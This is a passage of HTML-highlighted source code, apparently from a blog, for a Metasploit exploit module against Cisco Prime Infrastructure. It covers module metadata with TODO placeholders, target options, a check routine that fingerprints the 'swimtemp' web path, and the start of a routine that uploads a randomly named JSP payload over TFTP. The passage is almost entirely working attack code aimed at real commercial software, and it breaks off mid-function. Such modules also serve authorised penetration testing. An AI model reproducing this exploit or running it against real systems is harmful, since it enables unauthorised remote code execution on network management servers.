class=\"crayon-v\">writing<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Author&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;Pedro Ribeiro&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Vulnerability discovery and Metasploit module<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;License&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MSF_LICENSE<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;References&#8217;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;CVE&#8217;<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'TODO'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'CVE'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'TODO'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'URL'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'TODO'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'URL'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'TODO'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div 
class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Platform'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'linux'<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Arch'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">ARCH_X86<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ARCH_X64<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Targets'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'Cisco Prime Infrastructure'<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'Privileged'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'DefaultOptions'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'WfsDelay'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'DefaultTarget'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'DisclosureDate'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'TODO'<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">register_options<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">[<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptPort<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'RPORT'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'The target port'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">443<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptPort<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'RPORT_TFTP'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'TFTPD port'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">69<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">OptBool<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'SSL'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'Use SSL connection'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-v\">OptString<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">'TARGETURI'<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;swimtemp path&quot;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'\/swimtemp'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-60\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-61\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-62\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-63\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">check<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-64\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_request_cgi<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-65\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'uri'<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">normalize_uri<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'TARGETURI'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'swimtemp'<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">'method'<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'GET'<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">code<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">404<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># at the moment this is the best way to detect<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-70\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># a 404 in swimtemp only returns the error code with a body length of 0,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># while a 404 to another webapp or to the root returns code plus a body with content<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">CheckCode<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Detected<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-73\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">Exploit<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">CheckCode<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">Unknown<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-75\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-76\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">end<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-77\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-79\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">upload_payload<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'LPORT'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1025<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0xffff<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1025<\/span><span class=\"crayon-sy\">)<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-81\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">'LHOST'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">||<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;0.0.0.0&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">remote_file<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rand_text_alpha<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">rand<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">14<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'.jsp'<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-83\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tftp_client<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Rex<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Proto<\/span><span 
class=\"crayon-o\">::<\/span><span class=\"crayon-v\">TFTP<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-v\">Client<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">new<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;LocalHost&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;LocalPort&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;PeerHost&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rhost<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;PeerPort&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">datastore<\/span><span class=\"crayon-sy\">[<\/span><span 
class=\"crayon-s\">'RPORT_TFTP'<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;LocalFile&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;DATA:#{payload}&quot;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea6742971466-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;RemoteFile&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">remote_file<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea6742971466-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&quot;Mode&quot;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">'octet'<\/span><span 